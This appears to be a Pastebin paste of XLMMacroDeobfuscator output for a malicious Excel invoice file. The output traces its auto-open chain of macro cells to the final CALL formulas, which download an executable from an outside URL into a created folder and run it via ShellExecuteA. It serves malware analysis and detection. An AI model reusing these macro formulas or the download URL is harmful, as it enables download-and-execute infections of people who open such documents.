API tools faq
paste
Advertisement
dissectmalware

sample

dissectmalware
May 26th, 2020
548
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.26 KB | None | 0 0
raw download clone embed print report
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\infoinvoice_865092.xls\infoinvoice_865092.xlsm
  22.  
  23. [Loading Cells]
  24. auto_open: auto_openypcgg->wshCsjwHppdPqNZn!$GP$756
  25. [Starting Deobfuscation]
  26. CELL:GP756 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BT520)
  27. CELL:BT520 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GC64)
  28. CELL:GC64 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FS971)
  29. CELL:FS971 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD1775)
  30. CELL:BD1775 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IG1897)
  31. CELL:IG1897 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW548)
  32. CELL:HW548 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EN777)
  33. CELL:EN777 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DV981)
  34. CELL:DV981 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HV1440)
  35. CELL:HV1440 , FullEvaluation , RUN(wshCsjwHppdPqNZn!T868)
  36. CELL:T868 , FullEvaluation , RUN(wshCsjwHppdPqNZn!V208)
  37. CELL:V208 , FullEvaluation , RUN(wshCsjwHppdPqNZn!L526)
  38. CELL:L526 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CJ963)
  39. CELL:CJ963 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FE1891)
  40. CELL:FE1891 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HQ886)
  41. CELL:HQ886 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EE1823)
  42. CELL:EE1823 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CY1593)
  43. CELL:CY1593 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HL781)
  44. CELL:HL781 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FO617)
  45. CELL:FO617 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DL1624)
  46. CELL:DL1624 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DU1273)
  47. CELL:DU1273 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IJ745)
  48. CELL:IJ745 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CB1708)
  49. CELL:CB1708 , FullEvaluation , RUN(wshCsjwHppdPqNZn!Q480)
  50. CELL:Q480 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CU1272)
  51. CELL:CU1272 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FO259)
  52. CELL:FO259 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EX1078)
  53. CELL:EX1078 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FX1220)
  54. CELL:FX1220 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EO79)
  55. CELL:EO79 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AX12)
  56. CELL:AX12 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AF1326)
  57. CELL:AF1326 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AA114)
  58. CELL:AA114 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AK307)
  59. CELL:AK307 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CH1827)
  60. CELL:CH1827 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CT1937)
  61. CELL:CT1937 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EI965)
  62. CELL:EI965 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW1333)
  63. CELL:HW1333 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HE1376)
  64. CELL:HE1376 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GQ1438)
  65. CELL:GQ1438 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HW56)
  66. CELL:HW56 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD367)
  67. CELL:BD367 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EE1786)
  68. CELL:EE1786 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HE1602)
  69. CELL:HE1602 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DI1984)
  70. CELL:DI1984 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HR1943)
  71. CELL:HR1943 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AM1075)
  72. CELL:AM1075 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BM1289)
  73. CELL:BM1289 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BD1485)
  74. CELL:BD1485 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HP1465)
  75. CELL:HP1465 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DB1717)
  76. CELL:DB1717 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EQ1322)
  77. CELL:EQ1322 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AZ1191)
  78. CELL:AZ1191 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AK500)
  79. CELL:AK500 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HM1754)
  80. CELL:HM1754 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BO420)
  81. CELL:BO420 , FullEvaluation , RUN(wshCsjwHppdPqNZn!C387)
  82. CELL:C387 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CG1648)
  83. CELL:CG1648 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CV1)
  84. CELL:CV1 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CQ886)
  85. CELL:CQ886 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CJ10)
  86. CELL:CJ10 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CA140)
  87. CELL:CA140 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BR215)
  88. CELL:BR215 , FullEvaluation , RUN(wshCsjwHppdPqNZn!Z1977)
  89. CELL:Z1977 , FullEvaluation , RUN(wshCsjwHppdPqNZn!K1522)
  90. CELL:K1522 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FY283)
  91. CELL:FY283 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DW1579)
  92. CELL:DW1579 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GV611)
  93. CELL:GV611 , FullEvaluation , RUN(wshCsjwHppdPqNZn!II1071)
  94. CELL:II1071 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IK335)
  95. CELL:IK335 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EM1429)
  96. CELL:EM1429 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1822)
  97. CELL:HT1822 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IN226)
  98. CELL:IN227 , FullEvaluation , RUN(wshCsjwHppdPqNZn!R1386)
  99. CELL:R1386 , FullEvaluation , FORMULA("https://theartistry.co/opengate/readme.php",$BB$54)
  100. CELL:R1387 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BS1705)
  101. CELL:BS1706 , FullEvaluation , RUN(wshCsjwHppdPqNZn!X1283)
  102. CELL:X1283 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT\OJxSJzN.exe",$FV$10)
  103. CELL:X1284 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GD419)
  104. CELL:GD420 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BG360)
  105. CELL:BG360 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT\OJxSJzN.exe",$DO$1389)
  106. CELL:BG361 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DN1014)
  107. CELL:DN1015 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AV667)
  108. CELL:AV667 , FullEvaluation , FORMULA("URLMON",$FG$502)
  109. CELL:AV668 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EP1493)
  110. CELL:EP1494 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FL1071)
  111. CELL:FL1071 , FullEvaluation , FORMULA("URLDownloadToFileA",$GZ$1642)
  112. CELL:FL1072 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GF1117)
  113. CELL:GF1118 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GJ727)
  114. CELL:GJ727 , FullEvaluation , FORMULA("JJCCJJ",$FQ$216)
  115. CELL:GJ728 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HU1332)
  116. CELL:HU1333 , FullEvaluation , RUN(wshCsjwHppdPqNZn!BZ651)
  117. CELL:BZ651 , FullEvaluation , FORMULA("Shell32",$AF$553)
  118. CELL:BZ652 , FullEvaluation , RUN(wshCsjwHppdPqNZn!GG313)
  119. CELL:GG314 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AW466)
  120. CELL:AW466 , FullEvaluation , FORMULA("ShellExecuteA",$IO$1263)
  121. CELL:AW467 , FullEvaluation , RUN(wshCsjwHppdPqNZn!W991)
  122. CELL:W992 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CU864)
  123. CELL:CU864 , FullEvaluation , FORMULA("JJCCCCJ",$FU$70)
  124. CELL:CU865 , FullEvaluation , RUN(wshCsjwHppdPqNZn!ES194)
  125. CELL:ES195 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AY736)
  126. CELL:AY736 , FullEvaluation , FORMULA("Open",$GO$1633)
  127. CELL:AY737 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HB625)
  128. CELL:HB626 , FullEvaluation , RUN(wshCsjwHppdPqNZn!CE241)
  129. CELL:CE241 , FullEvaluation , FORMULA("regsvr32.exe",$F$470)
  130. CELL:CE242 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DH1652)
  131. CELL:DH1653 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AM496)
  132. CELL:AM496 , FullEvaluation , FORMULA("rundll32.exe",$FT$1531)
  133. CELL:AM497 , FullEvaluation , RUN(wshCsjwHppdPqNZn!EW329)
  134. CELL:EW330 , FullEvaluation , RUN(wshCsjwHppdPqNZn!IO305)
  135. CELL:IO305 , FullEvaluation , FORMULA("C:\YHGtfHd",$AK$1197)
  136. CELL:IO306 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1875)
  137. CELL:HT1876 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AO672)
  138. CELL:AO672 , FullEvaluation , FORMULA("C:\YHGtfHd\pElDosT",$AB$1242)
  139. CELL:AO673 , FullEvaluation , RUN(wshCsjwHppdPqNZn!FC1296)
  140. CELL:FC1297 , FullEvaluation , RUN(wshCsjwHppdPqNZn!O536)
  141. CELL:O536 , FullEvaluation , FORMULA("Kernel32",$GA$40)
  142. CELL:O537 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HN1652)
  143. CELL:HN1653 , FullEvaluation , RUN(wshCsjwHppdPqNZn!AX1977)
  144. CELL:AX1977 , FullEvaluation , FORMULA("CreateDirectoryA",$FY$218)
  145. CELL:AX1978 , FullEvaluation , RUN(wshCsjwHppdPqNZn!DM1240)
  146. CELL:DM1241 , FullEvaluation , RUN(wshCsjwHppdPqNZn!A1442)
  147. CELL:A1442 , FullEvaluation , FORMULA("JCJ",$BS$1104)
  148. CELL:A1443 , FullEvaluation , RUN(wshCsjwHppdPqNZn!HT1823)
  149. CELL:HT1823 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\YHGtfHd",0)
  150. CELL:HT1824 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\YHGtfHd\pElDosT",0)
  151. CELL:HT1826 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://theartistry.co/opengate/readme.php","C:\YHGtfHd\pElDosT\OJxSJzN.exe",0,0)
  152. CELL:HT1827 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\YHGtfHd\pElDosT\OJxSJzN.exe",,0,0)
  153. CELL:HT1830 , End , HALT()
  154. [END of Deobfuscation]
  155. time elapsed: 2.229518175125122
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!